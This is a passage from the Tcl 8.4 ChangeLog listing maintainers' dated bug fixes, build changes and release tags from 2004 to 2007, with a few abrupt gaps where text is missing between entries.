generic/tclParse.c: In contexts where interp and parsePtr->interp might be different, be sure to use the latter for error reporting. 2007-07-05 Don Porter <[email protected]> * library/init.tcl (unknown): Corrected inconsistent error message in interactive [unknown] when empty command is invoked. [Bug 1743676] 2007-06-30 Donal K. Fellows <[email protected]> * generic/tclBinary.c (Tcl_BinaryObjCmd): De-fang an instance of the shared-result anti-pattern. [Bug 1716704] 2007-06-30 Zoran Vasiljevic <[email protected]> * generic/tclThread.c: Prevent RemeberSyncObj() from growing the sync object lists by reusing already free'd slots, if possible. See discussion on Bug 1726873 for more information. 2007-06-29 Daniel Steffen <[email protected]> * generic/tclAlloc.c: on Darwin, ensure memory allocated by * generic/tclThreadAlloc.c: the custom TclpAlloc()s is aligned to 16 byte boundaries (as is the case with the Darwin system malloc). 2007-06-27 Don Porter <[email protected]> * generic/tclCmdMZ.c: Corrected broken trace reversal logic in * generic/tclTest.c: TclCheckInterpTraces that led to infinite loop * tests/basic.test: when multiple Tcl_CreateTrace traces were set and one of them did not fire due to level restrictions. [Bug 1743941]. 2007-06-23 Daniel Steffen <[email protected]> * macosx/tclMacOSXNotify.c (AtForkChild): don't call CoreFoundation APIs after fork() on systems where that would lead to an abort(). 2007-06-10 Jeff Hobbs <[email protected]> * README: updated links. [Bug 1715081] 2007-06-06 Daniel Steffen <[email protected]> * unix/configure.in (Darwin): add plist for tclsh; link the * unix/Makefile.in (Darwin): Tcl and tclsh plists into their * macosx/Tclsh-Info.plist.in (new): binaries in all cases. * unix/tcl.m4 (Darwin): fix CF checks in fat 32&64bit builds. * unix/configure: autoconf-2.13 2007-06-05 Don Porter <[email protected]> * tests/result.test (result-6.2): Add test for [Bug 1649062] so that 8.4 and 8.5 both test the same outcome and we verify compatibility. 2007-05-30 Don Porter <[email protected]> * README: Bump version number to 8.4.16 * generic/tcl.h: * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf-2.13 * win/configure: 2007-05-29 Jeff Hobbs <[email protected]> * unix/tclUnixThrd.c (Tcl_JoinThread): fix for 64-bit handling of pthread_join exit return code storage. [Bug 1712723] 2007-05-24 Don Porter <[email protected]> *** 8.4.15 TAGGED FOR RELEASE *** * generic/tclIO.c: Backport memleak fix in TclFinalizeIOSubsystem. 2007-05-17 Don Porter <[email protected]> * tests/fCmd.test: Backport the notNetworkFilesystem constraint. 2007-05-15 Don Porter <[email protected]> * generic/tclNamesp.c: Plugged memory leak related to [namespace delete ::]. [Bug 1716782] * changes: updates for 8.4.15 release. * win/tclWinReg.c: Bump to registry 1.1.5 to account * library/reg/pkgIndex.tcl: for [Bug 1682211] fix. 2007-05-10 Don Porter <[email protected]> * generic/tclInt.h: TclFinalizeThreadAlloc() is always defined, so make sure it is also always declared. [Tcl Bug 1706140] * generic/tclCmdMZ.c (Trace*Proc): Update Tcl_VarTraceProcs so * generic/tclLink.c (LinkTraceProc): that they call * generic/tclUtil.c (TclPrecTraceProc): Tcl_InterpDeleted() for themselves, and do not rely on (frequently buggy) setting of the TCL_INTERP_DESTROYED flag by the trace core. * generic/tclVar.c: Update callers of CallVarTraces to not pass in the TCL_INTERP_DESTROYED flag. Also apply filters so that public routines only pass documented flag values down to lower level routines. * generic/tclVar.c (CallVarTraces): The setting of the TCL_INTERP_DESTROYED flag is now done entirely within the CallVarTraces routine, the only place it can be done right. 2007-04-30 Daniel Steffen <[email protected]> * unix/Makefile.in: add 'tclsh' dependency to install targets that rely on tclsh, fixes parallel 'make install' from empty build dir. 2007-04-29 Daniel Steffen <[email protected]> * unix/tclUnixFCmd.c: add workaround for crashing bug in fts_open() * unix/tclUnixInit.c: without FTS_NOSTAT on 64bit Darwin 8 or earlier. * unix/tclLoadDyld.c (TclpLoadMemory): fix (void*) arithmetic. * macosx/tclMacOSXNotify.c: fix warnings. * macosx/README: sync whitespace/formatting with HEAD. * macosx/tclMacOSXBundle.c: * macosx/tclMacOSXNotify.c: * unix/tclLoadDyld.c: * macosx/Makefile: fix/add copyright and license refs. * macosx/tclMacOSXBundle.c: * macosx/Tcl-Info.plist.in: * unix/Makefile.in (dist): copy license.terms to dist macosx dir. * unix/configure.in: install license.terms into Tcl.framework. * unix/configure: autoconf-2.13 2007-04-21 Kevin B. Kenny <[email protected]> * generic/tclClock.c: Restored Cygwin buildability [Bug 1387154] * generic/tclInt.decls: Yet another round of attempting * generic/tclInt.h: to get the correct type signature * unix/tclUnixPort.h: for TclpLocaltime and TclpGmtime. * unix/tclUnixTime.c: CONST TclpTime_t is a 'time_t *CONST' * win/tclWinTime.c: and not a 'CONST time_t*' [Bug 1677275] * generic/tclIntDecls.h: * generic/tclIntPlatDecls.h: Regenerated. 2007-03-24 Zoran Vasiljevic <[email protected]> * win/tclWinThrd.c: Thread exit handler marks the current thread as un-initialized. This allows exit handlers that are registered later to re-initialize this subsystem in case they need to use some sync primitives (cond variables) from this file again. 2007-03-19 Don Porter <[email protected]> * generic/tclEvent.c (Tcl_CreateThread): Replaced some calls to * generic/tclPkg.c (CheckVersion): Tcl_Alloc() with calls to * unix/tclUnixTime.c (SetTZIfNecessary): ckalloc(), which better * win/tclAppInit.c (setargv): supports memory debugging. 2007-03-17 Kevin Kenny <[email protected]> * win/tclWinReg.c (GetKeyNames): Size the buffer for enumerating key names correctly, so that Unicode names exceeding 127 chars can be retrieved without crashing. [Bug 1682211] * tests/registry.test (registry-4.9): Added test case for the above bug. 2007-03-13 Don Porter <[email protected]> * generic/tclExecute.c (INST_FOREACH_STEP4): Re-fetch pointers for * tests/foreach.test (foreach-10.1): the value list each iteration of the loop as defense against shimmers. [Bug 1671087] * generic/tclVar.c (TclArraySet): Re-fetch pointers for the list * tests/var.test (var-17.1): argument of [array set] each time through the loop as defense against possible shimmer issues. [Bug 1669489]. 2007-03-10 Donal K. Fellows <[email protected]> * generic/tclCmdIL.c (Tcl_LsortObjCmd): Handle tricky case with loss * tests/cmdIL.test (cmdIL-1.29):of list rep during sorting due to shimmering. [Bug 1675116] 2007-03-07 Daniel Steffen <[email protected]> * macosx/tclMacOSXNotify.c: add spinlock debugging and sanity checks. * unix/tcl.m4 (Darwin): s/CFLAGS/CPPFLAGS/ in macosx-version-min check. * unix/configure: autoconf-2.13 2007-03-01 Donal K. Fellows <[email protected]> * generic/tclCompCmds.c (TclCompileForeachCmd): Prevent an unexpected * tests/foreach.test (foreach-9.1): infinite loop when the variable list is empty and the foreach is compiled. [Bug 1671138] 2007-02-22 Andreas Kupries <[email protected]> * tests/pkg.test: Added tests for the case of an alpha package satisfying a require for the regular package, demonstrating a corner case specified in TIP#280. More notes in the comments to the test. 2007-02-20 Don Porter <[email protected]> * doc/tcltest.n: Typo fix. [Bug 1663539] 2007-02-19 Jeff Hobbs <[email protected]> * generic/tclIOUtil.c (Tcl_FSEvalFile): safe incr of objPtr ref. * unix/tcl.m4: use>this". Note that Windows cannot support such access; there is no equivalent flag on the handle that can be set at the kernel-call level. The test is unix-specific in every way. [Bug 1245953] 2005-07-26 Mo DeJong <[email protected]> * unix/configure: Regen. * unix/configure.in: Check for a $prefix/share directory and add it the the package if found. This will check for Tcl packages in /usr/local/share when Tcl is configured with the default dist install. [Patch 1231015] 2005-07-26 Don Porter <[email protected]> * doc/tclvars.n: Improved $errorCode documentation. [RFE 776921] * generic/tclBasic.c (Tcl_CallWhenDeleted): Converted to use per-thread counter, rather than a process global one that required mutex protection. [RFE 1077194] * generic/tclNamesp.c (TclTeardownNamespace): Re-ordering so that * tests/trace.test (trace-34.4): command delete traces fire while the command still exists. [Bug 1047286] 2005-07-24 Mo DeJong <[email protected]> * unix/tcl.m4 (SC_PROG_TCLSH, SC_BUILD_TCLSH): * win/tcl.m4 (SC_PROG_TCLSH, SC_BUILD_TCLSH): Split confused search for tclsh on PATH and build and install locations into two macros. SC_PROG_TCLSH searches just the PATH. SC_BUILD_TCLSH determines the name of the tclsh executable in the Tcl build directory. [Bug 1160114], [Patch 1244153] 2005-07-22 Don Porter <[email protected]> * library/auto.tcl: Updates to the Tcl script library to make * library/history.tcl: use of Tcl 8.4 feautures. Thanks to * library/init.tcl: Patrick Fradin for prompting on this. * library/package.tcl: [Patch 1237755] * library/safe.tcl: * library/word.tcl: 2005-07-07 Jeff Hobbs <[email protected]> * unix/tcl.m4, unix/configure: Backported [Bug 1095909], removing * unix/tclUnixPort.h: any use of readdir_r as it is not * unix/tclUnixThrd.c: necessary and just confuses things. 2005-07-05 Don Porter <[email protected]> * generic/tclCmdAH.c: New "encoding" Tcl_ObjType (not registered) * generic/tclEncoding.c: that permits longer lifetimes of the * generic/tclInt.h: Tcl_Encoding values kept as intreps of Tcl_Obj's. Reduces the need for repeated reading of encoding definition files from the filesystem. [Bug 1077262] * generic/tclNamesp.c: Allow for [namespace import] of a command * tests/namespace.test: over a previous [namespace import] of itself without throwing an error. [RFE 1230597] 2005-07-01 Zoran Vasiljevic <[email protected]> * unix/tclUnixNotfy.c: protect against spurious wake-ups while waiting on the condition variable when tearing down the notifier thread. [Bug 1222872] 2005-06-27 Don Porter <[email protected]> *** 8.4.11 TAGGED FOR RELEASE *** * library/auto.tcl: Reverted to Revision 1.12.2.3 (Tcl 8.4.9). Restores the (buggy) behavior of [auto_reset] that fails to clear away auto-loaded commands from non-global namespaces. Fixing this bug exposed an unknown number of buggy files out there (including at least portions of the Tk script library) that cannot tolerate double [source]-ing. The burden of fixing these exposed bugs will not be forced on package/extension/application authors until Tcl 8.5. 2005-06-24 Kevin Kenny <[email protected]> * generic/tclEvent.c (Tcl_Finalize): * generic/tclInt.h: * generic/tclPreserve.c (TclFinalizePreserve): Changed the finalization logic so that Tcl_Preserve finalizes after exit handlers run; a lot of code called from Tk's exit handlers presumes tha Tcl_Preserve will still work even from an exit handler. Also, made the assertion check that no exit handlers are created in Tcl_Finalize conditional on TCL_MEM_DEBUG to avoid spurious panics in the "stable" release. 2005-06-24 Don Porter <[email protected]> * library/auto.tcl: Make file safe to re-[source] without destroying registered auto_mkindex_parser hooks. 2005-06-23 Daniel Steffen <[email protected]> * tools/tcltk-man2html.tcl: fixed useversion glob pattern to accept multi-digit patchlevels. 2005-06-23 Kevin Kenny <[email protected]> * win/tclWinChan.c: More rewriting of __asm__ blocks that * win/tclWinFCmd.c: implement SEH in GCC, because mingw's gcc 3.4.2 is not as forgiving of violations committed by the old code and caused panics. [Bug 1225957] 2005-06-23 Daniel Steffen <[email protected]> * unix/Makefile.in (install-private-headers): rewrite tclPort.h when installing private headers to remove ../unix relative #include path to tclUnixPort.h (which is incorrect at the installed location). 2005-06-22 Kevin Kenny <[email protected]> * generic/tclInt.h: Changed the finalization * generic/tclEvent.c (Tcl_Finalize): logic to defer the * generic/tclIO.c (TclFinalizeIOSubsystem): shutdown of the pipe * unix/tclUnixPipe.c (TclFinalizePipes): management until after * win/tclWinPipe.c (TclFinalizePipes): all channels have been closed, in order to avoid a situation where the Windows PipeCloseProc2 would re-establish the exit handler after exit handlers had already run, corrupting the heap. [Bug 1225727] Corrected a read of uninitialized memory in PipeCloseProc2, which (at least on certain configurations) caused a great number of tests to either fail or hang. [Bug 1225044] 2005-06-22 Andreas Kupries <[email protected]> * generic/tclInt.h: Followup to change made on 2005-06-18 by Daniel Steffen. There are compilers (*) who error out on the redefinition of WORDS_BIGENDIAN. We have to undef the previous definition (on the command line) first to make this acceptable. (*): AIX native. 2005-06-22 Don Porter <[email protected]> * win/tclWinFile.c: Potential buffer overflow. [Bug 1225571] Thanks to Pat Thoyts for discovery and fix. * tests/safe.test: Backport performance improvement from reduced $::auto_path. 2005-06-21 Pat Thoyts <[email protected]> * tests/winDde.test: Added some waits to the dde server script to let event processing run after we create the dde server and before we exit the server process. This avoids 'server did not respond' errors. 2005-06-21 Kevin Kenny <[email protected]> * generic/tclFileName.c: Corrected a problem where a directory name containing a colon can crash the process on Windows [Bug 1194458] * tests/fileName.test: Added test for [file split] and [file join] with a name containing a colon. * win/tclWinPipe.c: Reverted davygrvy's changes of 2005-04-19; they cause multiple failures in io.test. [Bug 1225044, still open] 2005-06-21 Don Porter <[email protected]> * generic/tclBasic.c: Made the walk of the active trace list aware * generic/tclCmdMZ.c: of the direction of trace scanning, so the * generic/tclInt.h: proper correction can be made. [Bug 1224585] * tests/trace.test (trace-34.2,3): * generic/tclBasic.c (Tcl_DeleteTrace): Added missing walk of the * tests/trace.test (trace-34.1): list of active traces to cleanup references to traces being deleted. [Bug 1201035] 2005-06-20 Don Porter <[email protected]> * doc/FileSystem.3: added missing Tcl_GlobTypeData documentation [Bug 935853] 2005-06-18 Daniel Steffen <[email protected]> * generic/tclInt.h: ensure WORDS_BIGENDIAN is defined correctly with fat compiles on Darwin (i.e. ppc and i386 at the same time), the configure AC_C_BIGENDIAN check is not sufficient in this case because a single run of the compiler builds for two architectures with different endianness. * unix/tcl.m4 (Darwin): add -headerpad_max_install_names to LDFLAGS to ensure we can always relocate binaries with install_name_tool. * unix/configure: autoconf-2.13 2005-06-18 Don Porter <[email protected]> * changes: Update changes for 8.4.11 release * README: Bump version number to 8.4.11 * generic/tcl.h: * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf * win/configure: 2005-06-18 Donal K. Fellows <[email protected]> * generic/tclCmdAH.c (Tcl_FormatObjCmd): Fix for [Bug 1154163]; only * tests/format.test: insert 'l' modifier when it is needed. 2005-06-07 Donal K. Fellows <[email protected]> * unix/tclUnixNotfy.c (Tcl_FinalizeNotifier): Add dummy variable so threaded build compiles. 2005-06-06 Kevin B. Kenny <[email protected]> * win/tclWin32Dll.c: Corrected another buglet in the assembly code for stack probing on Win32/gcc. [Bug 1213678] 2005-06-03 Daniel Steffen <[email protected]> *** 8.4.10 TAGGED FOR RELEASE *** * unix/tclLoadDyld.c: fixed header conflict when building this file with USE_TCL_STUBS. * macosx/Makefile: fixed 'embedded' target. 2005-06-02 Jeff Hobbs <[email protected]> * unix/Makefile.in (html): add BUILD_HTML_FLAGS optional var * tools/tcltk-man2html.tcl: add a --useversion to prevent confusion when multiple Tcl source dirs exist. * changes: updated for 8.4.10 release (porter) 2005-05-31 Zoran Vasiljevic <[email protected]> * unix/tclUnixNotfy.c: the notifier thread is now created as joinable thread and it is properly joined in Tcl_FinalizeNotifier. This is an attempt to fix [Bug 1082283] 2005-05-29 Jeff Hobbs <[email protected]> * win/tclWinThrd.c (TclpFinalizeThreadData): move tlsKey defn to top of file and clarify name (was 'key'). [Bug 1204064] 2005-05-27 Jeff Hobbs <[email protected]> * README: Bumped patchlevel to 8.4.10 * generic/tcl.h: * tools/tcl.wse.in: * unix/tcl.spec, unix/configure, unix/configure.in: * win/configure, win/configure.in: 2005-05-26 Daniel Steffen <[email protected]> * macosx/Makefile: moved & corrected EMBEDDED_BUILD check. * unix/configure.in: corrected framework finalization to softlink stub library to Versions/8.x subdir instead of Versions/Current. * unix/configure: autoconf-2.13 2005-05-25 Jeff Hobbs <[email protected]> * generic/tclCmdMZ.c (Tcl_TimeObjCmd): add necessary cast * unix/configure, unix/configure.in: ensure false Tcl.framework is only created with --enable-framework 2005-05-24 Daniel Steffen <[email protected]> * tests/env.test: added DYLD_FRAMEWORK_PATH to the list of env vars that need to be handled specially. * macosx/Makefile: * macosx/README: * macosx/Tcl-Info.plist.in (new file): * unix/Makefile.in: * unix/configure.in: * unix/tcl.m4: * unix/tclUnixInit.c: moved all Darwin framework build support from macosx/Makefile into the standard unix configure/make buildsystem, the macosx/Makefile is no longer required to build Tcl.framework (but its functionality is still available for backwards compatibility). * unix/configure: autoconf-2.13 * generic/tclIOUtil.c (TclLoadFile): * generic/tclInt.h: * unix/tcl.m4: * unix/tclLoadDyld.c: added support for [load]ing .bundle binaries in addition to .dylib's: .bundle's can be [unload]ed (unlike .dylib's), and can be [load]ed from memory, e.g. directly from VFS without needing to be written out to a temporary location first. [Bug 1202209] * unix/configure: autoconf-2.13 * generic/tclCmdMZ.c (Tcl_TimeObjCmd): change [time] called with a count > 1 to return a string with a float value instead of a rounded off integer. [Bug 1202178] 2005-05-20 Zoran Vasiljevic <[email protected]> * generic/tclParseExpr.c: removed unreferenced stack variable "errMsg" probably included by fixing [Bug 1201589] (see below). 2005-05-20 Don Porter <[email protected]> * generic/tclParseExpr.c: Corrected parser to recognize all boolean literals accepted by Tcl_GetBoolean, including prefixes like "y" and "f", and to allow "eq" and "ne" as function names in the proper context. [Bug 1201589] 2005-05-19 Daniel Steffen <[email protected]> * macosx/tclMacOSXNotify.c (Tcl_InitNotifier): fixed crashing CFRelease of runLoopSource in Tcl_InitNotifier (reported by Zoran): CFRunLoopAddSource doesn't CFRetain, so can only CFRelease the runLoopSource in Tcl_FinalizeNotifier. 2005-05-14 Daniel Steffen <[email protected]> * macosx/tclMacOSXBundle.c: * unix/tclUnixInit.c: * unix/tcl.m4 (Darwin): made use of CoreFoundation API configurable and added test of CoreFoundation availablility to allow building on ppc64, replaced HAVE_CFBUNDLE by HAVE_COREFOUNDATION; test for availability of Tiger or later OSSpinLockLock API. * unix/tclUnixNotfy.c: * unix/Makefile.in: * macosx/tclMacOSXNotify.c (new file): when CoreFoundation is available, use new CFRunLoop based notifier: allows easy integration with other event loops on Mac OS X, in particular the TkAqua Carbon event loop is now integrated via a standard tcl event source (instead of TkAqua upon loading having to finalize the exsting notifier and replace it with its custom version). [Patch 1202052] * tests/unixNotfy.test: don't run unthreaded tests on Darwin since notifier may be using threads even in unthreaded core. * unix/tclUnixPort.h: * unix/tcl.m4 (Darwin): test for thread-unsafe realpath durning configure, as Darwin 7 and later realpath is threadsafe. * macosx/tclMacOSXBundle.c: * unix/tclLoadDyld.c: * unix/tclUnixInit.c: fixed gcc 4.0 warnings. * unix/configure: autoconf-2.13 2005-05-10 Jeff Hobbs <[email protected]> * tests/string.test: string-10.[21-30] * generic/tclCmdMZ.c (Tcl_StringObjCmd): add extra checks to prevent possible UMR in unichar cmp function for string map. 2005-05-06 Jeff Hobbs <[email protected]> * unix/tcl.m4, unix/configure: correct Solaris 10 (5.10) check and add support for x86_64 Solaris cc builds. 2005-04-29 Donal K. Fellows <[email protected]> * doc/FileSystem.3: Backport of doc fix. [Bug 1172401] 2005-04-27 Don Porter <[email protected]> * library/init.tcl: Corrected flaw in interactive command * tests/main.test: auto-completion. [Bug 1191409] * tests/unixInit.test (7.1): Alternative fix for the 2005-04-22 commit. 2005-04-25 Daniel Steffen <[email protected]> * compat/string.h: fixed memchr() protoype for __APPLE__ so that we build on Mac OS X 10.1 again. * generic/tclNotify.c (TclFinalizeNotifier): fixed notifier not being finalized in unthreaded core (was testing for notifier initialization in current thread by checking thread id != 0 but thread id is always 0 in untreaded core). * unix/tclUnixNotfy.c (Tcl_WaitForEvent): sync with HEAD: only declare and use timeout var in unthreaded core. * unix/Makefile.in: added @PLAT_SRCS@ to SRCS and split out NOTIFY_SRCS from UNIX_SRCS for parity with UNIX_OBJS & NOTIFY_OBJS. * unix/configure.in: only run check for broken strstr implementation if AC_REPLACE_FUNCS(strstr) hasn't already determined that strstr is unavailable, otherwise compat/strstr.o will be used twice (resulting in duplicate symbol link errors on Mac OS X 10.1) * unix/tcl.m4 (Darwin): added configure checks for recently added linker flags -single_module and -search_paths_first to allow building with older tools (and on Mac OS X 10.1), use -single_module in SHLIB_LD and not just T{CL,K}_SHLIB_LD_EXTRAS, added unexporting from Tk of symbols from libtclstub to avoid duplicate symbol warnings, added PLAT_SRCS definition for Mac OS X. (SC_MISSING_POSIX_HEADERS): added caching of dirent.h check. (SC_TCL_64BIT_FLAGS): fixed 'checking for off64_t' message output. * unix/configure: autoconf-2.13 2005-04-22 Don Porter <[email protected]> * generic/tclCmdMZ.c: Corrected intrep-dependence of * tests/string.test: [string is boolean] [Bug 1187123] 2005-04-22 Daniel Steffen <[email protected]> * tests/unixInit.test (7.1): fixed failure when running tests with -tmpdir arg not set to working dir. 2005-04-20 Don Porter <[email protected]> * generic/tclGet.c (Tcl_GetInt): Corrected error that did not * generic/tclObj.c (Tcl_GetIntFromObj): permit 0x80000000 to be recognized as an integer on TCL_WIDE_INT_IS_LONG systems [Bug 1090869] 2005-04-19 Jeff Hobbs <[email protected]> * tests/winPipe.test (winpipe-6.2): remove -blocking 1 as this one can truly block. 2005-04-19 David Gravereaux <[email protected]> * win/tclWinPipe.c: The pipe channel driver now respects the -blocking option when closing. The windows pipe driver now has the same behavior as the UNIX side. This change. * tests/winPipe.test (winpipe-6.1/2): added 'fconfigure $f -blocking 1' so the exit status can be acquired. 2005-04-13 David Gravereaux <[email protected]> * generic/tclIO.c (Tcl_SetChannelBufferSize): Lowest size limit * tests/io.test: changed from ten bytes to one byte. Need for * tests/iogt.test: this change was proven by Ross Cartlidge <[email protected]> where [read stdin 1] was grabbing 10 bytes followed by starting a child process that was intended to continue reading from stdin. Even with -buffersize set to one, nine chars were getting lost by the buffersize over reading for the native read() caused by [read]. 2005-04-12 Kevin B. Kenny <[email protected]> * compat/strstr.c: Added default definition of NULL to accommodate building on systems with badly broken headers. [Bug 1175161] 2005-04-09 Daniel Steffen <[email protected]> * macosx/README: updated requirements for OS & developer tool versions + other small fixes/cleanup. * unix/tcl.m4 (Darwin): added -single_module linker flag to TCL_SHLIB_LD_EXTRAS and TK_SHLIB_LD_EXTRAS. * unix/configure: autoconf-2.13 2005-04-05 Zoran Vasiljevic <[email protected]> Set of changes correcting huge memory waste (not a leak) when a thread exits. This has been introduced in 8.4.7 within an attempt to correctly cleanup after ourselves when Tcl library is being unloaded with the Tcl_Finalize() call. This fixes the [Bug 1178445]. * generic/tclInt.h: added prototypes for TclpFreeAllocCache() and TclFreeAllocCache() * generic/tclThreadAlloc.c: modified TclFinalizeThreadAlloc() to explicitly call TclpFreeAllocCache with the NULL-ptr as argument signalling cleanup of private tsd key used only by the threading allocator. * unix/tclUnixThrd.c: fixed TclpFreeAllocCache() to recognize when being called with NULL argument. This is a signal for it to clean up the tsd key associated with the threading allocator. * win/tclWinThrd.c: renamed TclWinFreeAllocCache to TclpFreeAllocCache and fixed to recognize when being called with NULL argument. This is a signal for it to clean up the tsd key associated with the threading allocator. 2005-04-05 Don Porter <[email protected]> * generic/tclExecute.c (ExprSrandFunc): Replaced incursions into the * generic/tclUtil.c (TclGetIntForIndex): intreps of numeric types with simpler calls of Tcl_GetIntFromObj and Tcl_GetLongFromObj, now that those routines are better behaved wrt shimmering. [Patch 1177129] 2005-03-29 Jeff Hobbs <[email protected]> * win/tcl.m4, win/configure: do not require cygpath in macros to allow msys alone as an alternative. * win/tclWinTime.c (TclpGetDate): use time_t for 'time' [Bug 1163422] 2005-03-18 Don Porter <[email protected]> * generic/tclCompCmds.c (TclCompileIncrCmd): Corrected checks for immediate operand usage to permit leading space and sign characters. Restores more efficient bytecode for [incr x -1] that got lost in the CONST string reforms of Tcl 8.4. [Bug 1165671] * generic/tclBasic.c (Tcl_EvalEx,TclEvalTokensStandard): * generic/tclCmdMZ.c (Tcl_SubstObj): * tests/basic.test (basic-46.4): Restored recursion limit * tests/parse.test (parse-19.*): testing in nested command substitutions within direct script evaluation (Tcl_EvalEx) that got lost in the parser reforms of Tcl 8.1. Added tests for correct behavior. [Bug 1115904] 2005-03-15 Vince Darley <[email protected]> * generic/tclFileName.c: * win/tclWinFile.c: * tests/winFCMd.test: fix to 'file pathtype' and 'file norm' failures on reserved filenames like 'COM1:', etc. 2005-03-15 Kevin B. Kenny <[email protected]> * generic/tclClock.c: * generic/tclDate.c: * generic/tclGetDate.y: * generic/tclInt.decls: * unix/tclUnixTime.c: * win/tclWinTime.c: Replaced 'unsigned long' variable holding times with 'Tcl_WideInt', to cope with systems on which a time_t is wider than a long (Win64) [Bug 1163422] * generic/tclIntDecls.h: Regen 2005-03-15 Pat Thoyts <[email protected]> * unix/tcl.m4: Make it work on OpenBSD again. Imported patch from the OpenBSD ports tree. 2005-03-10 Don Porter <[email protected]> * generic/tclCmdMZ.c (TclCheckInterpTraces): Corrected mistaken cast of ClientData to (TraceCommandInfo *) when not warranted. Thanks to Yuri Victorovich for the report. [Bug 1153871] 2005-03-08 Jeff Hobbs <[email protected]> * win/makefile.vc: clarify necessary defined vars that can come from MSVC or the Platform SDK. 2005-02-24 Don Porter <[email protected]> * library/tcltest/tcltest.tcl: Better use of [glob -types] to avoid * tests/tcltest.test: failed attempts to [source] a directory, and similar matters. Thanks to "mpettigr". [Bug 1119798] * library/tcltest/pkgIndex.tcl: Bump to tcltest 2.2.8 2005-02-23 Donal K. Fellows <[email protected]> * doc/CrtChannel.3 (THREADACTIONPROC): Formatting fix. [Bug 1149605] 2005-02-17 Jeff Hobbs <[email protected]> * win/tclWinFCmd.c (TraverseWinTree): use wcslen on wchar, not Tcl_UniCharLen. 2005-02-16 Miguel Sofer <[email protected]> * doc/variable.n: fix for [Bug 1124160], variables are detected by [info vars] but not by [info locals]. 2005-02-10 Jeff Hobbs <[email protected]> * unix/Makefile.in: remove SHLIB_LD_FLAGS (only for AIX, inlined * unix/tcl.m4: into SHLIB_LD). Combine AIX-* and AIX-5 * unix/configure: branches in SC_CONFIG_CFLAGS. Correct gcc builds for AIX-4+ and HP-UX-11. 2005-02-10 Miguel Sofer <[email protected]> * generic/tclBasic.c (Tcl_EvalObjEx): * tests/basic.test (basic-26.2): preserve the arguments passed to TEOV in the pure-list branch, in case the list shimmers away. Fix for [Bug 1119369], reported by Peter MacDonald. 2005-02-10 Donal K. Fellows <[email protected]> * doc/binary.n: Made the documentation of sign bit masking and [binary scan] consistent. [Bug 1117017] 2005-02-01 Don Porter <[email protected]> * generic/tclExecute.c (TclCompEvalObj): Removed stray statement left behind in prior code reorganization. 2005-01-28 Jeff Hobbs <[email protected]> * unix/configure, unix/tcl.m4: add solaris 64-bit gcc build support. [Bug 1021871] 2005-01-27 Jeff Hobbs <[email protected]> * generic/tclBasic.c (Tcl_ExprBoolean, Tcl_ExprDouble) (Tcl_ExprLong): Fix to recognize Tcl_WideInt type. [Bug 1109484] 2005-01-27 Andreas Kupries <[email protected]> TIP#218 IMPLEMENTATION * generic/tclDecls.h: Regenerated from tcl.decls. * generic/tclStubInit.c: * doc/CrtChannel.3: Documentation of extended API, * generic/tcl.decls: extended testsuite, and * generic/tcl.h: implementation. Removal of old * generic/tclIO.c: driver-specific TclpCut/Splice * generic/tclInt.h: functions. Replaced with generic * tests/io.test: thread-action calls through the * unix/tclUnixChan.c: new hooks. Update of all builtin * unix/tclUnixPipe.c: channel drivers to version 4. * unix/tclUnixSock.c: Windows drivers extended to * win/tclWinChan.c: manage thread state in a thread * win/tclWinConsole.c: action handler. * win/tclWinPipe.c: * win/tclWinSerial.c: * win/tclWinSock.c: * mac/tclMacChan.c: 2005-01-25 Don Porter <[email protected]> * library/auto.tcl: Updated [auto_reset] to clear auto-loaded procs in namespaces other than :: [Bug 1101670]. 2005-01-25 Daniel Steffen <[email protected]> * unix/tcl.m4 (Darwin): fixed bug with static build linking to dynamic library in /usr/lib etc instead of linking to static library earlier in search path. [Bug 956908] Removed obsolete references to Rhapsody. * unix/configure: autoconf-2.13 2005-01-19 Mo DeJong <[email protected]> * win/tclWinChan.c (FileCloseProc): Invoke TclpCutFileChannel() to remove a FileInfo from the thread local list before deallocating it. This should have been done via an earlier call to Tcl_CutChannel, but I was running into a crash in the next call to Tcl_CutChannel during the IO finalization stage. 2005-01-17 Vince Darley <[email protected]> * tests/winFCmd.test: made test independent of current drive. [Bug 1066528] 2005-01-10 Donal K. Fellows <[email protected]> * unix/tclUnixFCmd.c (CopyFile): Convert u_int to unsigned to make clashes with types in standard C headers less of a problem. [Bug 1098829] 2005-01-06 Donal K. Fellows <[email protected]> * library/http/http.tcl (http::mapReply): Significant performance enhancement by using [string map] instead of [regsub]/[subst], and update version requirement to Tcl8.4. [Bug 1020491] 2005-01-05 Donal K. Fellows <[email protected]> * unix/tclUnixInit.c (localeTable): Add encoding mappings for some Chinese locales. [Bug 1084595] * doc/lsearch.n: Convert to other form of emacs mode control comment to prevent problems with old versions of man. [Bug 1085127] 2004] 2004-12-13 Kevin B. Kenny <[email protected]> * doc/clock.n: Clarify that the [clock scan] command does not accept the full range of ISO8601 point-in-time formats. [Bug 1075433] 2004-12-09 Donal K. Fellows <[email protected]> * doc/Async.3: Reword for better grammar, better nroff and get the flag name right. (Reported by David Welton.) 2004-12-06 Jeff Hobbs <[email protected]> *** 8.4.9 TAGGED FOR RELEASE *** * unix/tclUnixNotfy.c (NotifierThreadProc): init numFdBits [Bug 1079286] 2004-12-02 Jeff Hobbs <[email protected]> * changes: updated for 8.4.9 release 2004-12-02 Vince Darley <[email protected]> * generic/tclIOUtil.c: fix and new tests for [Bug 1074671] to * tests/fileSystem.test: ensure tilde paths are not returned specially by 'glob'. 2004-12-01 Don Porter <[email protected]> * library/auto.tcl (tcl_findLibrary): Disabled use of [file normalize] that caused trouble with freewrap. [Bug 1072136] 2004-11-26 Don Porter <[email protected]> * tests/reg.test (reg-32.*): Added missing testregexp constraints. * library/auto.tcl (tcl_findLibrary): Made sure the uniquifying operations on the search path does not also normalize. [Bug 1072136] 2004-11-26 Donal K. Fellows <[email protected]> * doc/dde.n: Resynchonized the documentation with itself and fixed some formatting errors. 2004-11-25 Zoran Vasiljevic <[email protected]> * doc/Notify.3: * doc/Thread.3: Added doc fixes and hints from [Bug 1068077]. 2004-11-25 Reinhard Max <[email protected]> * tests/tcltest.test: The order in which [glob] returns the file names * tests/fCmd.test: is undefined, so tests should not depend on it. 2004-11-24 Don Porter <[email protected]> * unix/tcl.m4 (SC_ENABLE_THREADS): Corrected failure to determine the number of arguments for readdir_r on SunOS systems. [Bug 1071701] * unix/configure: autoconf-2.13 2004-11-24 Jeff Hobbs <[email protected]> * README: Bumped patchlevel to 